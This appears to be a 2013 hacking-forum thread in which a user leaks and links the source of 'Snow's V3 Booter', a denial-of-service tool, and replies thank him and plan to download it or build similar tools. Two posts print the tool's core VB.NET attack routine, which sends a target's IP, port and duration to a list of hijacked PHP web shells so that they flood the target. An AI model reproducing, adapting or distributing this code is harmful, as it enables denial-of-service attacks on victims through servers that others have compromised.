Login Register


Snow's V3 Booter Source. filter_list
Author
Message
Snow's V3 Booter Source. #1
If you download this, don't be a leech! Say thanks.

Here is the source code for Snow's shell booter.
I guess it's private, so I decided to leak it. Enjoy.

Screenshots.
Spoiler:
[Image: 94d37e0d72.png]
[Image: 2b0604c282.png]



Download:
Ge.tt

Virus scan: (Because Johnny doesn't trust my links, idfk why.)
VirusTotal

Reply

RE: Snow's V3 Booter Source. #2
Nice share. Smile
[Image: 7ajmN5P.jpg]

Telegram: Oni_SL (Link)

Reply

RE: Snow's V3 Booter Source. #3
Thanks for the share. I will figure out about these "source codes". I shall do something productive.
[Image: 8536321abf.jpg]Me and Lux are the realest users here.
[STAFF DETERMINED SIGNATURE AS LEWD]
JDM>USDM

Reply

RE: Snow's V3 Booter Source. #4
Thanks.

Will download this.
[Image: tenor.gif]

🍫  πŸ¬Β πŸŽ€

Reply

RE: Snow's V3 Booter Source. #5
(07-26-2013, 06:36 AM)Johnny Wrote: Thanks for the share. I will figure out about these "source codes". I shall do something productive.

You will need visual studio 2010.

Reply

RE: Snow's V3 Booter Source. #6
Haha, oh god. And he's got 1K reputation.

The main piece of code:
Code:
Sub attack() Dim i As Integer Dim web As New WebClient With {.Proxy = Nothing} 'http://1.2.3.4Shell.php?act=phptools&host=68.49.228.103&time=10 Dim attkstring As String = "?act=phptools&host=" & IP.Text & "&port=" & Port.Text & "&time=" & Time.Text i = 0 AttackButton.Enabled = False Dim shellx As Integer = 0 For Each item In shells.Items Try web.Dispose() web.OpenRead(shells.Items(shellx) & attkstring) Catch ex As Exception End Try shellx += 1 Next AttackButton.Enabled = True End Sub

Either way, good job leaking.

Reply

RE: Snow's V3 Booter Source. #7
(07-26-2013, 11:20 AM)SQLi Wrote: Haha, oh god. And he's got 1K reputation.

The main piece of code:
Code:
Sub attack() Dim i As Integer Dim web As New WebClient With {.Proxy = Nothing} 'http://1.2.3.4Shell.php?act=phptools&host=68.49.228.103&time=10 Dim attkstring As String = "?act=phptools&host=" & IP.Text & "&port=" & Port.Text & "&time=" & Time.Text i = 0 AttackButton.Enabled = False Dim shellx As Integer = 0 For Each item In shells.Items Try web.Dispose() web.OpenRead(shells.Items(shellx) & attkstring) Catch ex As Exception End Try shellx += 1 Next AttackButton.Enabled = True End Sub

Either way, good job leaking.

Who has 1k rep? O_o
At least he didn't use web browsers xD

Reply

RE: Snow's V3 Booter Source. #8
(07-26-2013, 12:09 PM)Kirito Wrote: Who has 1k rep? O_o
At least he didn't use web browsers xD

The person who made that project, he put his own HF link somewhere in it.

Reply

RE: Snow's V3 Booter Source. #9
nice Biggrin good job i keep on leaking more im going to make a wb booter Smile

Reply

RE: Snow's V3 Booter Source. #10
Thanks.

Will download this.

Reply







Users browsing this thread: 1 Guest(s)